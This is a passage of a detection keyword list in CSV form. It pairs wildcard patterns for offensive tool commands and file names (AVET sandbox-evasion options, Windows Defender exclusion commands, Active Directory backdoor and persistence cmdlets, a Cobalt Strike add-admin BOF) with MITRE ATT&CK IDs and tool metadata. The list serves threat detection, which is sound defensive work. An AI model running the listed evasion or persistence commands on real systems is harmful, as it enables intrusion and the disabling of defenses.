Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion evasion_by_sleep *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion fopen_sandbox_evasion*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion get_bios_info*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion get_computer_domain *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion get_cpu_cores *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion get_install_date *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion get_num_processes*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion get_standard_browser *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion get_tickcount*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion gethostbyname_sandbox_evasion*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_background_wp*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_folder *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_network_drive*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_public_desktop*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_recent_files*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_recycle_bin*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_username *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_vm_mac*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion has_vm_regkey*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion hide_console*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion interaction_getchar*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion interaction_system_pause*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion is_debugger_present*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion sleep_by_ping *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*Add_Privilege /Process:* /Privilege:*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*addcomputer.py -computer-name * -computer-pass * -dc-host * -domain-netbios *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*addcomputer.py -delete -computer-name * -dc-host * -domain-netbios *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*addcomputer.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*Add-ConstrainedDelegationBackdoor*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Add-Exfiltration.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Add-KeePassConfigTrigger*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*AddKeePassTrigger.ps1*,offensive_tool_keyword,crackmapexec,Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*Add-MpPreference -ExclusionPath *,offensive_tool_keyword,powershell,Windows Defender evasion add an exclusion directory for your shady stuff,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Add-MpPreference -ExclusionProcess *\Windows\System32\WindowsPowerShell\v1.0\powershell.exe*,greyware_tool_keyword,powershell,Exclude powershell from defender detections,T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -*Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder*CN=System' -PrincipalSamAccountName * -Rights All*,offensive_tool_keyword,powerview,modifying existing permissions on an Active Directory object ('AdminSDHolder'). which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and modifying its permissions may lead to unintended security consequences.,T1222,TA0003,N/A,N/A,Persistence,https://github.com/zloeber/PSAD/blob/master/src/inprogress/Add-ObjectACL.ps1,1,0,N/A,N/A,1,15,2,2017-10-26T20:35:53Z,2017-07-07T13:34:07Z -*Add-Persistence *,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Add-Persistence*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Add-Persistence.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*addpriv SeloadDrivePrivilege*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Add-PSFirewallRules*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerBreach.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Add-PswaAuthorizationRule -UsernName \* -ComputerName \* -ConfigurationName \*,greyware_tool_keyword,powershell,allows all users to access all computers with a specified configuration,T1053,TA0003,N/A,N/A,Persistence,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Add-RegBackdoor.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*Add-RemoteRegBackdoor*,offensive_tool_keyword,AD exploitation cheat sheet,Using DAMP toolkit We add the backdoor using the Add-RemoteRegBackdoor.ps1 cmdlet from DAMP.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,POST Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Add-RemoteRegBackdoor*,offensive_tool_keyword,DAMP,The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.,T1222 - T1222.002 - T1548 - T1548.002,TA0005 ,N/A,N/A,Persistence,https://github.com/HarmJ0y/DAMP,1,1,N/A,10,4,356,78,2019-07-25T21:18:37Z,2018-04-06T22:13:58Z -*addresshunter.h*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Add-ServiceDacl *,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Add-ServiceDacl*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*addspn.py -u * -p * -t * -s * --additional *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*addspn.py*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,1,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*AddUser-Bof.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that Add an admin user,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0x3rhy/AddUser-Bof,1,1,N/A,10,10,52,12,2022-10-11T06:51:27Z,2021-08-30T10:09:20Z -*AddUser-Bof.git*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that Add an admin user,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0x3rhy/AddUser-Bof,1,1,N/A,10,10,52,12,2022-10-11T06:51:27Z,2021-08-30T10:09:20Z -*AddUser-Bof.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that Add an admin user,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0x3rhy/AddUser-Bof,1,1,N/A,10,10,52,12,2022-10-11T06:51:27Z,2021-08-30T10:09:20Z -*AddUser-Bof.x64*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that Add an admin user,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 